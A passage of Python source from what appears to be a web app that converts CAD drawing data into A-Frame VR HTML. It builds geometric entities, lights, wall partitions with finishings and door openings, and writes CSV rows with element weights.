'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data['radius-top']};' if data['segments-height']!='18': outstr += f'segments-height: {data['segments-height']};' if data['segments-radial']!='36': outstr += f'segments-radial: {data['segments-radial']};' if data['theta-length']!='360': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cone>\n</a-entity>\n' return outstr def make_circle(page_obj, x, data): outstr = f'<a-entity id="circle-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-circle id="circle-{x}" \n' if data['2'] == 'circle': outstr += f'rotation="-90 0 0"\n' outstr += f'radius="{fabs(data['41'])}" \n' outstr += 'geometry="' try: if data['segments']!='32': outstr += f'segments: {data['segments']};' if data['theta-length']!='360': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-circle>\n</a-entity>\n' return outstr def make_cylinder(page_obj, x, data): outstr = f'<a-entity id="cylinder-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-cylinder id="cylinder-{x}" \n' outstr += f'position="0 {data['43']/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data['radius-top']};' if data['segments-height']!='18': outstr += f'segments-height: {data['segments-height']};' if data['segments-radial']!='36': outstr += f'segments-radial: {data['segments-radial']};' if data['theta-length']!='360': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cylinder>\n</a-entity>\n' return outstr def make_curvedimage(x, data): outstr = f'<a-entity id="curvedimage-{x}-ent" \n' outstr += 'shadow="receive: false; cast: false" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-curvedimage id="curvedimage-{x}" \n' outstr += f'position="0 {data['43']/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' try: if data['theta-length']!='270': outstr += f'theta-length="{data['theta-length']}" ' if data['theta-start']!='0': outstr += f'theta-start="{data['theta-start']}" ' except KeyError: pass outstr += f'src="#image-{data['8']}">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-curvedimage>\n</a-entity>\n' return outstr def make_sphere(page_obj, x, data): outstr = f'<a-entity id="sphere-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-sphere id="sphere-{x}" \n' outstr += f'position="0 {data['43']} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['phi-length']!='360': outstr += f'phi-length: {data['phi-length']};' if data['phi-start']!='0': outstr += f'phi-start: {data['phi-start']};' if data['segments-height']!='18': outstr += f'segments-height: {data['segments-height']};' if data['segments-width']!='36': outstr += f'segments-width: {data['segments-width']};' if data['theta-length']!='180': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-sphere>\n</a-entity>\n' return outstr def make_plane(page_obj, x, data): outstr = f'<a-entity id="plane-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-plane id="plane-{x}" \n' if data['2'] == 'look-at':#if it's a look at, it is centered and looks at the camera foot outstr += f'position="0 {data['43']/2} 0" \n' outstr += 'look-at="#camera-foot" \n' elif data['2'] == 'ceiling':#if it's a ceiling, correct position outstr += f'position="{data['41']/2} {-data['43']/2} 0" \n' else:#insertion is at corner outstr += f'position="{data['41']/2} {data['43']/2} 0" \n' outstr += f'width="{fabs(data['41'])}" height="{fabs(data['43'])}" \n' outstr += 'geometry="' try: if data['segments-height']!='1': outstr += f'segments-height: {data['segments-height']};' if data['segments-width']!='1': outstr += f'segments-width: {data['segments-width']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-plane>\n</a-entity>\n' return outstr def make_text(x, data): outstr = f'<a-entity id="text-{x}" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}"\n' outstr += f'text="width: {data['41']}; align: {data['align']}; color: {data['color']}; ' outstr += f'value: {data['text']}; wrap-count: {data['wrap-count']}; ' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n' return outstr def make_link(page_obj, x, data): outstr = f'<a-link id="link-{x}" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}"\n' outstr += f'scale="{data['41']} {data['43']} {data['42']}"\n' if data['tree'] == 'parent': target = page_obj.get_parent() elif data['tree'] == 'child': target = page_obj.get_first_child() elif data['tree'] == 'previous' or data['tree'] == 'prev': target = page_obj.get_prev_sibling() else:#we default to next sibling target = page_obj.get_next_sibling() try: if target: outstr += f'href="{target.url}"\n' outstr += f'title="{data['title']}" color="{data['color']}" on="click"\n' eq_image = target.specific.equirectangular_image if eq_image: outstr += f'image="{eq_image.file.url}"' else: outstr += 'image="#default-sky"' outstr += '>\n' if data['animation']: outstr += is_animation(data) outstr += '</a-link>\n' return outstr else: return '' except: return '' def make_triangle(page_obj, x, data): outstr = f'<a-triangle id="triangle-{x}" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'geometry="vertexA:{data['10']} {data['30']} {data['20']}; \n' outstr += f'vertexB:{data['11']} {data['31']} {data['21']}; \n' outstr += f'vertexC:{data['12']} {data['32']} {data['22']}" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}; ' if page_obj.double_face: outstr += 'side: double; ' outstr += '">\n</a-triangle> \n' return outstr def make_light(page_obj, x, data): outstr = f'<a-entity id="light-{x}" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}"\n' try: if data['type'] == 'ambient': outstr += f'light="type: ambient; color: {data['color']}; intensity: {data['intensity']}; ' outstr += '">\n' elif data['type'] == 'point': outstr += f'light="type: point; color: {data['color']}; intensity: {data['intensity']}; ' outstr += f'decay: {data['decay']}; distance: {data['distance']}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += '"> \n' elif data['type'] == 'spot': outstr += f'light="type: spot; color: {data['color']}; intensity: {data['intensity']}; ' outstr += f'decay: {data['decay']}; distance: {data['distance']}; ' outstr += f'angle: {data['angle']}; penumbra: {data['penumbra']}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' else:#defaults to directional outstr += f'light="type: directional; color: {data['color']}; intensity: {data['intensity']}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'shadowCameraBottom: {-5*fabs(data['42'])}; \n' outstr += f'shadowCameraLeft: {-5*fabs(data['41'])}; \n' outstr += f'shadowCameraTop: {5*fabs(data['42'])}; \n' outstr += f'shadowCameraRight: {5*fabs(data['41'])}; \n' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' except KeyError:#default if no light type is set outstr += 'light="type: point; intensity: 0.75; distance: 50; decay: 2; ' if page_obj.shadows: outstr += 'castShadow: true;' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n'#close light entity return outstr class APartition(object): def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? it would be much cleaner self.page_obj = page_obj.specific self.d['alert'] = 'None' self.type_obj = False if self.d['type']: try: self.type_obj = types.get(title = self.d['type']) except: pass self.finishings = finishings self.csv_f = csv_f def calc_weight(self): part_weight = 0 unit_weight = 0 zero_weight = 0 part_thickness = 0 fixed_thickness = True for part_layer in self.type_obj.part_layers.all(): part_layer_thickness = fabs(float(part_layer.thickness)) part_layer_weight = fabs(float(part_layer.weight)) if part_layer_thickness == 0: fixed_thickness = False zero_weight = part_layer_weight part_thickness += part_layer_thickness unit_weight += part_layer_thickness/100 * part_layer_weight unit_weight += (fabs(self.d['42']) - part_thickness/100) * zero_weight#add eventual zero thickness layer part_weight = unit_weight * fabs(self.d['41']) * fabs(self.d['43'])#actual part size if self.d['2'] == 'a-openwall': part_weight = part_weight - (unit_weight * fabs(self.d['door_off_2']-self.d['door_off_1']) * fabs(self.d['door_height']))#remove door if part_thickness and fixed_thickness and fabs(self.d['42']) != part_thickness/100: self.d['alert'] = 'Different than Partition Type' elif fabs(self.d['42']) < part_thickness/100: self.d['alert'] = 'Partition too thin' else: if self.type_obj.image: self.d['8'] = 'partition-' + self.type_obj.title self.d['repeat'] = self.type_obj.pattern if self.type_obj.color: self.d['color'] = self.type_obj.color #writing to csv file self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},-,-,{self.type_obj.title},{self.d['10']},{-self.d['20']},{self.d['30']},') self.csv_f.write(f'{self.d['210']},{-self.d['220']},{self.d['50']},{self.d['41']},{self.d['42']},{self.d['43']},{part_weight},{self.d['alert']} \n') return def no_weight(self): #writing to csv file self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},-,-,None,{self.d['10']},{-self.d['20']},{self.d['30']},') self.csv_f.write(f'{self.d['210']},{-self.d['220']},{self.d['50']},{self.d['41']},{self.d['42']},{self.d['43']},0,{self.d['alert']} \n') return def write_html(self): #start entity outstr = f'<a-entity id="{self.d['2']}-{self.d['num']}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d['10']} {self.d['30']} {self.d['20']}" \n' outstr += f'rotation="{self.d['210']} {self.d['50']} {self.d['220']}">\n' #slab handle is on top if self.d['2'] == 'a-slab': y = self.d['43'] else: y = 0 #top surface if self.d['2'] == 'a-slab': self.d['side'] = 'floor' else: self.d['side'] = 'top' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {self.d['43']-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="-90 0 0"> \n' else: outstr += 'rotation="-90 180 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom surface, a-openwall has left and right bottoms if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'ceiling' else: self.d['side'] = 'bottom' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #inside surface, a-openwall has left, right and top insides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'front' else: self.d['side'] = 'in' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {-y} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside surface, a-openwall has left, right and top outsides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'back' else: self.d['side'] = 'out' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {-y} {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #left surface self.d['side'] = 'left' self.d['sub_side'] = 'left' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="0 {-y} {-self.d['42']/2}" \n' if self.d['41'] > 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #right surface self.d['side'] = 'right' self.d['sub_side'] = 'right' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']} {-y} {-self.d['42']/2}" \n' if self.d['41'] < 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' if self.d['2'] == 'a-openwall': #bottom left surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['door_off_1']/2} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom right surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2+self.d['door_off_2']} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #inside left surface self.d['side'] = 'in' self.d['sub_side'] = 'in-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['door_off_1']/2} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside right surface self.d['side'] = 'in' self.d['sub_side'] = 'in-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2+self.d['door_off_2']} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside top surface self.d['side'] = 'in' self.d['sub_side'] = 'in-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2} {self.d['door_height']} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside left surface self.d['side'] = 'out' self.d['sub_side'] = 'out-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['door_off_1']/2} 0 {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside right surface self.d['side'] = 'out' self.d['sub_side'] = 'out-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2+self.d['door_off_2']} 0 {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside top surface self.d['side'] = 'out' self.d['sub_side'] = 'out-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2} {self.d['door_height']} {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #end entity outstr += '</a-entity>\n' return outstr def part_simple_finishing(self): try: finishing = self.finishings.get(title = self.d[self.d['side']]) if self.d['side']=="floor": if finishing.skirting_image: part_image = 'skirting-' + finishing.title part_repeat = finishing.skirting_pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.skirting_color: part_color = finishing.skirting_color else: part_color = self.d['color'] else: if finishing.image: part_image = 'finishing-' + finishing.title part_repeat = finishing.pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.color: part_color = finishing.color else: part_color = self.d['color'] self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},-,{part_image},-,-,-,-,-,-,-,{self.d['width']},{self.d['height']},-,-,- \n') except: part_image = self.d['8'] part_repeat = self.d['repeat'] part_color = self.d['color'] outstr = f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}" \n' outstr += f'position="0 {self.d['height']/2} 0" \n' outstr += f'width="{self.d['width']}" height="{self.d['height']}"\n' outstr += f'material="src: #image-{part_image}; color: {part_color}' outstr += is_repeat(part_repeat, self.d['width'], self.d['height']) outstr += '">\n</a-plane>\n' return outstr def part_striped_finishing(self): if self.d['sub_side']=='in-top' or self.d['sub_side']=='out-top': door_height = fabs(self.d['door_height'])*self.d['43']/fabs(self.d['43']) else: door_height = 0 try: finishing = self.finishings.get(title = self.d[self.d['side']]) wall_height = fabs(self.d['height']) tiling_height = fabs(float(finishing.tiling_height))/100*self.d['43']/fabs(self.d['43']) skirting_height = fabs(float(finishing.skirting_height))/100*self.d['43']/fabs(self.d['43']) if door_height > wall_height: door_height = wall_height tiling_height = wall_height skirting_height = wall_height else: if skirting_height < door_height: skirting_height = door_height if skirting_height > wall_height: skirting_height = wall_height if tiling_height < skirting_height: tiling_height = skirting_height if tiling_height > wall_height: tiling_height = wall_height wall_height = wall_height - tiling_height tiling_height = tiling_height - skirting_height skirting_height = skirting_height - door_height if finishing.image: wall_image = 'finishing-' + finishing.title wall_repeat = finishing.pattern else: wall_image = self.d['8'] wall_repeat = self.d['repeat'] if finishing.color: wall_color = finishing.color else: wall_color = self.d['color'] outstr = '' if wall_height: outstr += f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}" \n' outstr += f'position="0 {wall_height/2+tiling_height+skirting_height} 0" \n' outstr += f'width="{self.d['width']}" height="{wall_height}" \n' outstr += f'material="src: #image-{wall_image}; color: {wall_color}' outstr += is_repeat(wall_repeat, self.d['width'], wall_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},Wall,{finishing.title},-,-,-,-,-,-,{self.d['width']},{wall_height},-,-,- \n') if tiling_height: outstr += f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-tiling" \n' outstr += f'position="0 {tiling_height/2+skirting_height} 0" \n' outstr += f'width="{self.d['width']}" height="{tiling_height}" \n' outstr += f'material="src: #image-tiling-{finishing.title}; color: {finishing.tiling_color}' outstr += is_repeat(finishing.tiling_pattern, self.d['width'], tiling_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},Tiling,{finishing.title},-,-,-,-,-,-,{self.d['width']},{tiling_height},-,-,- \n') if skirting_height: outstr += f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-skirting" \n' outstr += f'position="0 {skirting_height/2} 0" \n' outstr += f'width="{self.d['width']}" height="{skirting_height}" \n' outstr += f'material="src: #image-skirting-{finishing.title}; color: {finishing.skirting_color}' outstr += is_repeat(finishing.skirting_pattern, self.d['width'], skirting_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},Skirting,{finishing.title},-,-,-,-,-,-,{self.d['width']},{skirting_height},-,-,- \n') except: outstr = f'<a-plane id="except-{self.d['2']}-{self.d['num']}-{self.d['sub_side']}" \n' outstr += f'position="0 {(self.d['height']-door_height)/2} 0" \n' outstr += f'width="{self.d['width']}" height="{self.d['height']-door_height}" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], self.d["width"], self.d["height"]-door_height) outstr += f'">\n</a-plane> \n' return outstr def write_html_alert(self): outstr = f'<a-entity id="{self.d['2']}-{self.d['num']}-alert: {self.d['alert']}" \n' outstr += f'position="{self.d['10']} {self.d['30']} {self.d['20']}" \n' outstr += f'rotation="{self.d['210']} {self.d['50']} {self.d['220']}">\n' if self.d["2"] == 'a-openwall': outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert-left" \n' outstr += f'position="{self.d['door_off_1']/2} {self.d['door_height']/2} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['door_off_1'])} {fabs(self.d['door_height'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert-right" \n' outstr += f'position="{(self.d['41']-self.d['door_off_2'])/2+self.d['door_off_2']} {self.d['door_height']/2} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41']-self.d['door_off_2'])} {fabs(self.d['door_height'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert-top" \n' outstr += f'position="{self.d['41']/2} {(self.d['43'] - self.d['door_height'])/2+self.d['door_height']} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41'])} {fabs(self.d['43'] - self.d['door_height'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' else: outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert" \n' outstr += f'position="{self.d['41']/2} {self.d['43']/2} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41'])} {fabs(self.d['43'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += '</a-entity>\n' return outstr class AOpening(object):#face it, this could be a APartition subclass def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? it would be much cleaner self.page_obj = page_obj.specific self.d['alert'] = 'None'#sets alert default self.d['frame_image'] = ''#sets frame defaults self.d['frame_pattern'] = '' self.d['frame_color'] = self.d['color'] self.type_obj = False if self.d['type']:#looks for partition type try: self.type_obj = types.get(title = self.d['type']) except: pass self.finish_obj = False if self.d['finishing']:#looks for finishing try: self.finish_obj = finishings.get(title = self.d['finishing']) except: pass self.csv_f = csv_f def has_finishing(self): #we change appearance according to finishing if self.finish_obj.tiling_image: self.d['8'] = 'tiling-' + self.finish_obj.title self.d['repeat'] = self.finish_obj.tiling_pattern if self.finish_obj.tiling_color: self.d['color'] = self.finish_obj.tiling_color if self.finish_obj.skirting_image: self.d['frame_image'] = 'skirting-' + self.finish_obj.title self.d['frame_repeat'] = self.finish_obj.skirting_pattern if self.finish_obj.skirting_color: self.d['frame_color'] = self.finish_obj.skirting_color return def has_type(self): #we don't calculate door weight, but we change appearance accordingly to partition type if self.type_obj.image: self.d['8'] = 'partition-' + self.type_obj.title self.d['repeat'] = self.type_obj.pattern if self.type_obj.color: self.d['color'] = self.type_obj.color #writing to csv file opening_weight = 0#by now useless self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},-,-,{self.type_obj.title},{self.d['10']},{-self.d['20']},{self.d['30']},') self.csv_f.write(f'{self.d['210']},{-self.d['220']},{self.d['50']},{self.d['41']},{self.d['42']},{self.d['43']},{opening_weight},{self.d['alert']} \n') return def no_type(self): #writing to csv file self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},-,-,None,{self.d['10']},{-self.d['20']},{self.d['30']},') self.csv_f.write(f'{self.d['210']},{-self.d['220']},{self.d['50']},{self.d['41']},{self.d['42']},{self.d['43']},0,{self.d['alert']} \n') return def write_html(self): #start entity outstr = f'<a-entity id="{self.d['2']}-{self.d['num']}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d['10']} {self.d['30']} {self.d['20']}" \n' outstr += f'rotation="{self.d['210']} {self.d['50']} {self.d['220']}">\n' #left frame outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-left-frame" \n' outstr += f'position="{-0.049*unit(self.d['41'])} {(self.d['43']+0.099*unit(self.d['43']))/2} {-self.d['42']/2}" \n' outstr += 'rotation="0 0 90" \n' outstr += f'scale="{fabs(self.d['43'])+0.099} 0.1 {fabs(self.d['42'])+0.02}" \n' outstr += f'material="src: #image-{self.d['frame_image']}; color: {self.d['frame_color']}">' outstr += '</a-box>\n' #right frame outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-right-frame" \n' outstr += f'position="{self.d['41']+0.049*unit(self.d['41'])} {(self.d['43']+0.099*unit(self.d['43']))/2} {-self.d['42']/2}" \n' outstr += 'rotation="0 0 90" \n' outstr += f'scale="{fabs(self.d['43'])+0.099} 0.1 {fabs(self.d['42'])+0.02}" \n' outstr += f'material="src: #image-{self.d['frame_image']}; color: {self.d['frame_color']}">' outstr += '</a-box>\n' #top frame outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-top-frame" \n' outstr += f'position="{self.d['41']/2} {self.d['43']+0.049*unit(self.d['43'])} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41'])-0.002} 0.1 {fabs(self.d['42'])+0.02}" \n' outstr += f'material="src: #image-{self.d['frame_image']}; color: {self.d['frame_color']}">' outstr += '</a-box>\n' if self.d["type"] == 'ghost': outstr += '</a-entity>\n' return outstr else: if eval(self.d["sliding"]): if eval(self.d["double"]): #animated slide 1 outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-slide-1"> \n' outstr += f'<a-animation attribute="position" from="0 0 0" to="{-(self.d['41'])/2} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 1 outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-moving-part-1" \n' outstr += f'position="{self.d['41']/4} {(self.d['43']-0.001*unit(self.d['43']))/2} {-self.d['42']/2}" \n' outstr += f'scale="{(fabs(self.d['41']))/2-0.002} {self.d['43']-0.001*unit(self.d['43'])} 0.05" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #animated slide 2 outstr += f'<a-entity 